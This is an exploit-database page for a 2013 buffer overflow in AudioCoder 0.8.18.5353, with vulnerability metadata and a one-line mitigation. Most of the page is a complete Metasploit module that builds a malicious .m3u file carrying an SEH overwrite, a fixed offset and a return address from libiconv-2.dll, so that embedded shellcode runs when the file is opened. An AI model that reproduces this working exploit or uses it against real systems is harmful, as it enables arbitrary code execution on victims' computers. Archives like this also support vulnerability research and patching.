header-logo
Suggest Exploit
vendor:
AudioCoder
by:
metacom and juan vazquez
7,8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: AudioCoder
Affected Version From: 0.8.18.5353
Affected Version To: 0.8.18.5353
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 and Windows 7 SP1
2013

AudioCoder .M3U Buffer Overflow

This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability occurs when adding an .m3u, allowing arbitrary code execution with the privileges of the user running AudioCoder. This module has been tested successfully on AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.

Mitigation:

Update to the latest version of AudioCoder
Source

Exploit-DB raw data:

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AudioCoder .M3U Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Audio Code 0.8.18. The vulnerability
        occurs when adding an .m3u, allowing arbitrary code execution with the privileges
        of the user running AudioCoder. This module has been tested successfully on
        AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '92939' ],
          [ 'EDB', '25141' ]
        ],
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 6596,
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
          'DisableNops'     => true,
          'StackAdjustment' => -3500,
        },
      'Targets'        =>
        [
          [ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'     => 0x66011b56, # ppr from libiconv-2.dll
              'Offset'  => 765
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'May 01 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
      ], self.class)

  end

  def exploit
    buffer = "http://"
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    file_create(buffer)
  end
end

Navigation

Suggest Exploit

Services By CQR